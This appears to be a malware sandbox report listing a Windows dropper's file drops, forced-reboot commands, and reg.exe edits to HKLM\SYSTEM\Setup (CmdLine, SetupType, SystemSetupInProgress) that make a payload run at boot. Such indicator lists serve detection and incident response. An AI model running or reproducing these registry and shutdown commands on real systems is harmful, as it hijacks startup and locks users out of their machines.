Technical Information
- <SYSTEM32>\shutdown.exe with %TEMP%\ixp000.tmp\shutdown.exe
- %TEMP%\ixp000.tmp\part0.bat
- %TEMP%\ixp000.tmp\part1.bat
- %TEMP%\ixp000.tmp\part2.exe
- %TEMP%\ixp000.tmp\shutdown.exe
- %TEMP%\ixp000.tmp\shutdown32.exe
- %TEMP%\ixp000.tmp\part0.bat
- from %TEMP%\ixp000.tmp\part1.bat to %WINDIR%\temp\part1.bat
- from %TEMP%\ixp000.tmp\part2.exe to %WINDIR%\temp\part2.bat
- from %TEMP%\ixp000.tmp\shutdown32.exe to <SYSTEM32>\shutdown32.exe
- '<SYSTEM32>\shutdown.exe' -r -f -t 0
- '<SYSTEM32>\shutdown32.exe' -r -f -t 0
- '<SYSTEM32>\cmd.exe' /c part0.bat
- '<SYSTEM32>\cmd.exe' /K %WINDIR%\Temp\part1.bat
- '<SYSTEM32>\reg.exe' query "HKU\S-1-5-19\Environment"
- '<SYSTEM32>\reg.exe' add "HKLM\SYSTEM\Setup" /v "CmdLine" /t REG_SZ /d "cmd /c %WINDIR%\Temp\part2.exe" /f
- '<SYSTEM32>\reg.exe' add "HKLM\SYSTEM\Setup" /v "OOBEInProgress" /t REG_DWORD /d "1" /f
- '<SYSTEM32>\reg.exe' add "HKLM\SYSTEM\Setup" /v "RestartSetup" /t REG_DWORD /d "1" /f
- '<SYSTEM32>\reg.exe' add "HKLM\SYSTEM\Setup" /v "SetupPhase" /t REG_DWORD /d "3" /f
- '<SYSTEM32>\reg.exe' add "HKLM\SYSTEM\Setup" /v "SetupType" /t REG_DWORD /d "2" /f
- '<SYSTEM32>\reg.exe' add "HKLM\SYSTEM\Setup" /v "SystemSetupInProgress" /t REG_DWORD /d "1" /f
- '<SYSTEM32>\cmd.exe' /c %WINDIR%\Temp\part2.exe